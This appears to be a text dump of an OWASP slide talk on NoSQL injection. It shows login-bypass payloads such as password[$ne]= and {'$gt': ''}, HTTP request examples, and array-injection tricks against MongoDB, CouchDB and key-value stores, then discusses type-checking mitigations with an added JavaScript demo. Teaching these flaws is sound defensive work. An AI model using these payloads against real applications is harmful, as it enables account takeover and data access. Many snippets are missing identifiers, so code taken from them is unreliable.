NOSQL INJECTION - OWASP

NOSQL INJECTION - FUN WITH OBJECTS AND ARRAYS
Patrick Spiegel

MOTIVATION
".. with MongoDB we are not building queries from strings, so traditional SQL injection attacks are not a" - MongoDB Developer FAQ

AGENDA
Scope, Attacker Model, Attacks, Mitigation

SCOPE - DATABASES
Database type and ranking:
Document store - 5
Key-value store - 9
Key-value cache - 23
Document store - 26

SCOPE - TECHNOLOGY STACK
What do we have to consider for NoSQL injection? Databases, database drivers, application servers, frameworks: ~ 64 technology stack combinations.

ATTACKER MODEL - MIGHTINESS
The attacker is aware of the deployed technology stack including application server, driver, frameworks and database. The attacker is able to send arbitrary requests to the server with the authorization of a normal application user.

ATTACKER MODEL - GOAL
The attacker's goal is to achieve unintended behavior of the database query by altering the query. The attacker is able to trigger unintended CRUD operations.

ATTACKER MODEL - NOSQL INJECTION ATTACKER vs. SQL ATTACKER MODEL
Query languages for unstructured data
Diverse system landscapes with multiple databases
Direct client-side database access via

ATTACKS - WHAT'S ALREADY KNOWN?


Login bypass for MongoDB on PHP and NodeJS
String concatenation is still an issue for JSON and script parameters
Escaping flaws of drivers
Memcached - got fixed!

MONGODB - LOGIN BYPASS
// NodeJS
('users').find({ "user": , "password": });
login?user=patrick&password[%24ne]=
// NodeJS - the resulting query
('users').find({ "user": "patrick", "password": {"$ne": ""} });

MONGODB - LOGIN BYPASS
// PHP
$collection->find(array(
  'user' => $_GET['user'],
  'password' => $_GET['password']
));

WHAT'S EVEN NEW?
# Ruby on Rails
db['users'].find({ :user => ['user'], :password => ['password'] })
# Python with Django
({ "user": ['user'], "password": ['password'] })

LOGIN BYPASS - also works for POST requests!
POST /login
Host:
Content-Type: application/json
Content-Length: 38

{'user': 'patrick', 'password': {'$gt': ''}}

POST /login
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

user=Patrick&password[%24ne]=

PARAMETER OVERWRITE
Just a key-value store - what's the worst that could happen?

PARAMETER OVERWRITE
// NodeJS
( , new Date("November 8, 2026 11:13:00").getTime() );
../expire?key[]=foo&key[]=1117542887
Injected array overwrites all following parameters of each database function! Only the NodeJS driver is affected!

LOGIN BYPASS
// NodeJS
function checkCredentials(user, password, callback) {
  var options = {'selector': {'user': user, 'password': password}};
  ('users').get('_find', options, (err, res) => {
    callback( === 1);
  });
}
checkCredentials( , , handleResult);
login?user=patrick&password[%24ne]=
Inject a query selector to bypass the password check!

LOGIN BYPASS - then let's check the password within the application layer!
// NodeJS
function checkCredentials(user, password, callback) {
  ('users').get(user, (err, res) => {
    callback( === password);
  });
}
checkCredentials( , , handleResult);
Use the special _all_docs document with an undefined password property!

CHECK BYPASS
Hmm .. then let's check the properties!

CHECK BYPASS
// NodeJS
function getDocument(key, callback) {
  if (key === "secretDoc" || key[0] === "_") {
    callback("Not authorized!");
  } else {
    ('documents').get(key, callback);
  }
}
getDocument( );
[]=secretDoc
[]=

ARRAY INJECTION
function getCache(key) {
  if (key.indexOf('auth_') === 0) {
    callback("Invalid key!");
  } else {
    (key, (err, body) => {
      callback(err || body);
    });
  }
}
getCache( , handleResult);
[]=auth_patrick
Array injection bypasses application layer checks!

SUMMARY
All attacks shown with GET requests also work with POST and PUT requests!
Nearly all attacks work on NodeJS, PHP, Ruby and Python in combination with certain frameworks!
Object and array injection changes semantics and is key for the attacks!

WHAT'S THE PROBLEM?
The queries' semantics are encoded in the object or type structure of the passed parameters.
{'password': '1234'} vs {'password': {'$ne': '1'}}

IS TYPE CASTING A SOLUTION?
{'password': ()}
Secure against type manipulation
Not flexible enough for unstructured data
Easy to forget in practice
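The MongoDB login bypass and the type-casting mitigation from the slides, worked through as an added example that is not part of the OWASP deck: a minimal bracket-notation parser stands in for qs/Express "extended" body parsing, an in-memory matcher that knows only `$ne` stands in for MongoDB's find(), and `requireStrings` is the type check (all three names are this example's own). The same check also rejects the `key[]=...` arrays from the array-injection slides, which is why it is applied to every field before the selector is built.

```javascript
// Stand-in for qs / Express "extended" body parsing (a[b]=c -> {a:{b:'c'}},
// a[]=x -> {a:['x']}); URLSearchParams already decodes %24 to '$'.
function parseExtended(body) {
  const out = {};
  for (const [rawKey, value] of new URLSearchParams(body)) {
    const m = /^([^\[\]]+)(?:\[([^\[\]]*)\])?$/.exec(rawKey);
    if (!m) continue;                       // deeper nesting not needed here
    const [, name, sub] = m;
    if (sub === undefined) {
      out[name] = value;                    // plain key: user=patrick
    } else if (sub === '') {
      if (!Array.isArray(out[name])) out[name] = [];
      out[name].push(value);                // key[]=v collects into an array
    } else {
      if (typeof out[name] !== 'object' || out[name] === null) out[name] = {};
      out[name][sub] = value;               // key[$ne]=v becomes an operator object
    }
  }
  return out;
}

// Mitigation ("type casting" on the slides): only string values may enter the
// selector, so operator objects and injected arrays are rejected up front.
function requireStrings(params, fields) {
  const clean = {};
  for (const f of fields) {
    if (typeof params[f] !== 'string') throw new TypeError(f + ' must be a string');
    clean[f] = params[f];
  }
  return clean;
}

// Tiny in-memory stand-in for MongoDB find(): literal equality plus the $ne
// operator only, enough to show why the injected selector matches every user.
function matches(doc, selector) {
  return Object.entries(selector).every(([field, cond]) =>
    cond !== null && typeof cond === 'object' && '$ne' in cond
      ? doc[field] !== cond.$ne
      : doc[field] === cond);
}

const users = [{ user: 'patrick', password: 's3cret' }]; // constructed sample data

// safe=false uses the parsed body as-is (vulnerable); safe=true type-checks it first.
function login(body, safe) {
  const params = parseExtended(body);
  const selector = safe ? requireStrings(params, ['user', 'password'])
                        : { user: params.user, password: params.password };
  return users.filter(d => matches(d, selector)).length === 1;
}
```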

IS DYNAMIC CODE ANALYSIS A SOLUTION?
{user: 'Patrick', address: {city: 'Karlsruhe', code: 76133}}
Reduces user-controlled data to string and integer values
Application-controlled

DYNAMIC CODE ANALYSIS - DATA VARIETY?
if ( && ) {
  ({user: , address: });
} else if ( && ) {
  ({user: , phone: });
} else if ..
Secure against structure manipulation
Impractical for many different property combinations!

IS DYNAMIC CODE ANALYSIS A SOLUTION?
IMHO NO
Breaks existing implementations
Extensive code adjustments necessary
Hard to handle data variety securely
